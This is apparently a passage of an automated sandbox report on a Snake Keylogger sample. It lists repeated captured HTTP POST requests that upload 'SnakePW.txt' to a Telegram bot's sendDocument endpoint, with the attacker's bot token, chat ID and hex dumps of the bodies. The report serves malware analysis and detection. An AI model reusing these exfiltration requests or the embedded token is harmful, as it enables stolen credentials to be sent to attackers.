                            Data Ascii: {"ok":true,"result":{"message_id":66944,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            176192.168.2.550034149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:54 UTC297OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575701aead2e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:54 UTC297OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 61 65 61 64 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575701aead2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:54 UTC298INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:54 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:54 UTC298INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66945,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            177192.168.2.550035149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:54 UTC298OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575701e32082
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:54 UTC299OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 65 33 32 30 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575701e32082Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:55 UTC299INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:55 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:55 UTC300INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66947,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            178192.168.2.550037149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:55 UTC300OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575702211da0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:55 UTC300OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 32 31 31 64 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575702211da0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:55 UTC301INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:55 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:55 UTC301INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66948,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            179192.168.2.550039149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:55 UTC302OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757025cb83f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:55 UTC302OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 35 63 62 38 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757025cb83fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:55 UTC303INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:55 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:55 UTC303INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66949,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.549786149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:45 UTC30OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d8b3d0ea
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:45 UTC30OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 62 33 64 30 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d8b3d0eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:46 UTC31INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:46 UTC31INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66765,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            180192.168.2.550040149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:56 UTC303OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575702938e2d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:56 UTC304OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 39 33 38 65 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575702938e2dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:56 UTC304INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:56 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:56 UTC305INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66950,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228836,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            181192.168.2.550042149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:56 UTC305OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575702d65175
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:56 UTC305OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 64 36 35 31 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575702d65175Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:56 UTC306INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:56 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:56 UTC306INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66951,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228836,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            182192.168.2.550043149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:56 UTC307OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757030d2640
                            Host: api.telegram.org
                            Content-Length: 504
